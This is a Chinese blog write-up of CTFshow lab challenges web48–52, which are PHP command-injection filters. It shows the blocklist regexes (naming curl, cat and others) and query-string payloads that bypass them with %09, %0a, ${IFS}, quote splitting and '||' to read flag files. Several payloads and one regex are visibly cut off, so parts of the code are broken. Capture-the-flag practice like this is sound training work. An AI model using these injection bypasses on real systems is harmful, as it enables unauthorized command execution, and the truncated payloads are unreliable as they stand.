-
CTFshow web48 49 50 51 52
目录
web48
代码分析:
- if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`/i", $c)){
- system($c." >/dev/null 2>&1");
- }
emm,这里过滤了很多用不上的东西,直接%09绕过空格,引号绕过flag%0a绕过后面的重定向就可以
知识点:%09和%0a不算数字所以过滤[0-9]没有影响的
payload:
?c=tac%09fl""ag.php||
?c=tac%09fl""ag.php%0a
flag:
ctfshow{d4152ec2-7b1b-48f4-9822-706bea5ddef6}
web49
代码分析:
if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%/i", $c)){这道题过滤了百分号,但是仍然可以用前面的方法,跟%09不是数字一样,也可以用<绕过空格,引号绕过flag,||绕过重定向
知识点:||运算前面成功则不执行后面
payload:
?c=tac
?c=tac%09fl""ag.php%0a
flag:
ctfshow{f9e25313-a058-40ce-86bc-86d980db1303}
web50
代码分析:
if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%|\x09|\x26/i", $c)这题过滤了X09其实就是把%09过滤了,但是问题不大直接小于号绕过
payload:
?c=tac
?c=tac
flag:
ctfshow{f6423ca9-8937-46c2-b232-fe172f434014}
web51
代码分析:
if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26/i", $c))把tac过滤了,可以使用nl替换,我还是喜欢tac,nl内容要用F12查看源代码,不如tac来的方便
payload:
?c=nl
flag:
ctfshow{ba1d21a6-bcd4-4ece-a281-fb18d757dbb8}
web52
代码分析:
if(!preg_match("/\;|cat|flag| |[0-9]|\*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26|\>|\, $c)这题过滤了<,但是把$放出来了,尝试用了一下$IFS$1不行,感觉很奇怪后来才注意到数字给过滤了,那可以尝试一下${IFS}
?c=nl${IFS}fl""ag.php||
看是看到了但是没有flag啊,到这我就懵逼了,查了大佬的题解发现这个flag.php是假的,真正的flag在别的地方
ls看一下
ls${IFS}/看一下上层目录
发现上层目录中有个flag
nl一下看看
payload:
nl${IFS}/fl""ag||
flag:
ctfshow{efe850f1-7eac-44ce-897f-b5c1d0509d5b}
-
相关阅读:
leetCode 76. 最小覆盖子串 + 滑动窗口 + 图解(详细)
解决:Package ‘setuptools‘ requires a different Python: 3.7.16 not in ‘>=3.8‘
发现流程任务的提交时间不对,@JsonFormat时间格式及时区问题
Mybatis - Spring整合后一级缓存失效了
黑客(网络安全)技术自学30天
干货分享 | 关于同星硬件接口卡及TSMaster软件常见问题Q&A指南
Gradle vs Maven
评价指标和超参数调整进阶
【虚幻引擎UE】UE4/UE5 基于2D屏幕坐标获取场景3D坐标 射线检测(蓝图/C++)
34.nacos客户端读取共享配置文件实例(springcloud)
- 原文地址:https://blog.csdn.net/qq_40345591/article/details/127784493